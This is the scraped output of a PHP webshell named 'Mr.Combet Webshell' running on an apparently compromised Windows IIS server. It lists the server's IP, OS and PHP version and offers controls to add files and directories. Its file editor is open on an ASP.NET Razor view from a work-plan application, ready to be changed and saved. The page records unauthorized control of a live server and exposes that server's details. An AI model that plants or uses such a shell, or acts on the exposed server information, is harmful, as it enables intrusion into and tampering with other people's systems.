Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
VITA
/
Views
/
WorkPlanSelf
/
Edit File Name :
_ActivityLogSelfListPartialView.cshtml
@model RER_Project.DataAccess.ViewModels.WorkPlanSelf.ActivityLogSelfVM @using RER_Project.BusinessLayer.BusinessService @using RER_Project.Core.Helpers @{ var meta = AppUserService.GetCurrent(); } <div id="dvData"> <br /> <div id="user-detail" width="100%"> <div style="font-size:20px"> Year-Month: @Model.YearName-@Model.MonthName </div> </div> <br /> <div class="table table-responsive table-striped table-hover table-bordered" style="overflow-x: auto; white-space: nowrap;" width=100%> <table class="table table-striped table-bordered" border="1"> <thead> <tr> <th>UserName</th> <th>Log Date (BS)</th> <th>Tasks</th> <th class="hideColumn">Action</th> </tr> </thead> @foreach (var item in Model.ActivityLogDetailList) { <tr> <td>@item.UserName</td> <td> @item.LogDateNepali </td> <td> @Html.Raw(item.TaskPerformedStatus) </td> <td class="hideColumn"> <a href="/daily/activity/edit/@item.Id"><i class="fa fa-edit"></i></a> @if (meta.RoleId == 1) { <a href="/activitylog/self/delete/@item.Id"><i class="fa fa-trash"></i></a> } </td> </tr> } </table> </div> <br /> <br /> </div> <div class="pagination" id="pagination_active"> @if (Model.PagerHelper.CurrentPage > 1) { <button class="btn btn-primary" value="@(Model.PagerHelper.CurrentPage-1)" id="@(Model.PagerHelper.CurrentPage-1)" onclick="callSearchPagination(@(Model.PagerHelper.CurrentPage-1))">Prev </button> } @for (long i = Model.PagerHelper.StartPage; i < (Model.PagerHelper.EndPage + 1); i++) { <button class="btn @(Model.PagerHelper.CurrentPage == i ? "btn-primary active" : "")" value="@i" id="@i" onclick="callSearchPagination(@i)">@i</button> } @if (Model.PagerHelper.CurrentPage < Model.PagerHelper.TotalPages) { <button class="btn btn-primary" value="@(Model.PagerHelper.CurrentPage+1)" id="@(Model.PagerHelper.CurrentPage+1)" onclick="callSearchPagination(@(Model.PagerHelper.CurrentPage+1))">Next</button> } </div> <style> .pagination { display: inline-block; } .pagination a { color: black; float: left; padding: 8px 16px; text-decoration: none; transition: background-color .3s; border: 1px solid #ddd; } .pagination a.active { background-color: #4CAF50; color: white; border: 1px solid #4CAF50; } .pagination a:hover:not(.active) { background-color: #ddd; } .td:nth-child(7) { min-width: 100px; } @@media(max-width:756px) { .dropdown-spacing { padding-bottom: 10px; } } </style>
Save